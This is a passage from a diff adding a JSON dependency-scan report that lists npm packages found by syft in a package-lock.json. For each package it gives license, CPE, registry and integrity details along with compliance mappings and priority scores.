"MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:p-limit:p-limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p-limit:p_limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_limit:p-limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_limit:p_limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p-limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p_limit:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/p-limit@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", + "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", + "dependencies": { + "p-try": "^2.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6cbc6aaefd17b7fc", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: p-limit 3.1.0", + "title": "p-limit 3.1.0", + "description": "Package discovered: p-limit 3.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bdf7b3073a60eac3", + "name": "p-limit", + "version": "3.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:p-limit:p-limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p-limit:p_limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_limit:p-limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_limit:p_limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p-limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p_limit:3.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/p-limit@3.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", + "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", + "dependencies": { + "yocto-queue": "^0.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "16add8edeff36c6a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: p-locate 4.1.0", + "title": "p-locate 4.1.0", + "description": "Package discovered: p-locate 4.1.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ee16619fa3035ca6", + "name": "p-locate", + "version": "4.1.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:p-locate:p-locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p-locate:p_locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_locate:p-locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_locate:p_locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p-locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p_locate:4.1.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/p-locate@4.1.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", + "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", + "dependencies": { + "p-limit": "^2.2.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "94f4f30dde8856c2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: p-try 2.2.0", + "title": "p-try 2.2.0", + "description": "Package discovered: p-try 2.2.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ee061a11e32e10c1", + "name": "p-try", + "version": "2.2.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:p-try:p-try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p-try:p_try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_try:p-try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p_try:p_try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p-try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:p:p_try:2.2.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/p-try@2.2.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", + "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "8f14c9999630c748", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: package-json-from-dist 1.0.1", + "title": "package-json-from-dist 1.0.1", + "description": "Package discovered: package-json-from-dist 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "d82606f27243dac6", + "name": "package-json-from-dist", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BlueOak-1.0.0", + "spdxExpression": "BlueOak-1.0.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:package-json-from-dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package-json-from-dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json_from_dist:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json_from_dist:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package-json-from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package-json-from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json_from:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json_from:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package-json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package-json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package_json:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package:package-json-from-dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:package:package_json_from_dist:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/package-json-from-dist@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", + "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "09093ffb9ed76376", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: pako 0.2.9", + "title": "pako 0.2.9", + "description": "Package discovered: pako 0.2.9", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7762d448aa187997", + "name": "pako", + "version": "0.2.9", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "(MIT AND Zlib)", + "spdxExpression": "(MIT AND Zlib)", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + }, + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:pako:pako:0.2.9:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/pako@0.2.9", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/pako/-/pako-0.2.9.tgz", + "integrity": "sha512-NUcwaKxUxWrZLpDG+z/xZaCgQITkA/Dv4V/T6bw7VON6l1Xz/VnrBqrYjZQ12TamKHzITTfOEIYUj48y2KXImA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d21476c4aa5bcc9d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: pako 1.0.11", + "title": "pako 1.0.11", + "description": "Package discovered: pako 1.0.11", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8811cee431746c6d", + "name": "pako", + "version": "1.0.11", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "(MIT AND Zlib)", + "spdxExpression": "(MIT AND Zlib)", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:pako:pako:1.0.11:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/pako@1.0.11", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/pako/-/pako-1.0.11.tgz", + "integrity": "sha512-4hLB8Py4zZce5s4yd9XzopqwVv/yGNhV1Bl8NTmCq1763HeK2+EwVTv+leGeL13Dnh2wfbqowVPXCIO0z4taYw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b50b24498bc5a2c6", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: parse-svg-path 0.1.2", + "title": "parse-svg-path 0.1.2", + "description": "Package discovered: parse-svg-path 0.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7c5d21eaeee09ad2", + "name": "parse-svg-path", + "version": "0.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:parse-svg-path:parse-svg-path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse-svg-path:parse_svg_path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse_svg_path:parse-svg-path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse_svg_path:parse_svg_path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse-svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse-svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse_svg:parse-svg-path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse_svg:parse_svg_path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse:parse-svg-path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:parse:parse_svg_path:0.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/parse-svg-path@0.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/parse-svg-path/-/parse-svg-path-0.1.2.tgz", + "integrity": "sha512-JyPSBnkTJ0AI8GGJLfMXvKq42cj5c006fnLz6fXy6zfoVjJizi8BNTpu8on8ziI1cKy9d9DGNuY17Ce7wuejpQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 